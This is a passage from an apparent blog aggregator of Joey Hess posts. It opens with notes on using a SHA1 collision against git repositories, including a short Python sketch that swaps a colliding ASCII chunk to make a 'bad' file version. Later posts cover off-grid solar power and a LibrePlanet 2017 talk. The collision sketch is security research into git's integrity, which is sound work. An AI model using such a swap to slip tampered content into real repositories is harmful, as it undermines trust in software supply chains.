  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.
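As an aside, here's a toy sketch (my own illustration, certainly not an attack) of the chunk swap described above: given two same-length colliding chunks built from printable ASCII, the bad version of a file is just the good version with that ~128 byte region replaced.

def make_bad_version(good_file: bytes, good_chunk: bytes, bad_chunk: bytes) -> bytes:
    # Both chunks must be the same length and, in this scenario, printable ASCII.
    assert len(good_chunk) == len(bad_chunk)
    assert all(0x20 <= b <= 0x7e for b in good_chunk + bad_chunk)
    # The good and bad versions were constructed to share a SHA1, so producing
    # the bad file is just a byte-for-byte swap of the colliding chunk.
    return good_file.replace(good_chunk, bad_chunk, 1)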

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

22 February 2017

Joey Hess: early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up. Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before. Also, turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed to the cliff earlier; it seemed to be worst when house voltage was low.) Soon, 6 months of more power than I can use.. Previously: battery bank refresh, late summer, the cliff

17 February 2017

Joey Hess: Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!) After attending for four years, I finally thought it was time to perhaps speak at it.
Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the Free Software Awards and discuss pressing threats and important opportunities for software freedom. Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998." That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone. Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.
-- Here's a sneak peek at LibrePlanet 2017: Register today! I'll be giving some variant of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.
